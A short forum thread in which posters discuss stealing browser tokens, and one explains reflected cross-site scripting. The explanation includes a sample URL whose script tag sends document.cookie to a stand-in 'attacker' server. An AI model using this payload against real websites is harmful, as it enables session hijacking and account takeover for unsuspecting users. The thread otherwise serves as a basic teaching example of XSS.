This topic contains 1 reply, has 2 voices, and was last updated by Immortalem 1 month, 2 weeks ago.
- August 2, 2020 at 6:41 pm #290002
This would be good for stealing tokens.
- August 2, 2020 at 6:41 pm #290003
look up the same origin policy. You’ll realize that this isn’t possible in modern browsers.
- August 2, 2020 at 6:41 pm #290004
Only if the website has an XSS vulnerability for example your victim sends a request with the cookie to the attackers webserver. One of the many ways looks like this:
Attacker sets up a webserver, attackers tricks the victim to click a url with a script like
` http://www.website.com/<script>window.location = ‘http://attacker/?cookie=’+document.cookie </script> `
This wil make the victim go to
` http://attacker/?cookie= (cookie from the previous website) `
That wil trigger an HTTP request to the attacler’s server like ‘this pc has tried to request http://attacker/cookie=blablabla‘ where blablabla represents the cookie of the victim from that one website.
This is a very simple example of XSS, read more here: https://excess-xss.com/
You must be logged in to reply to this topic.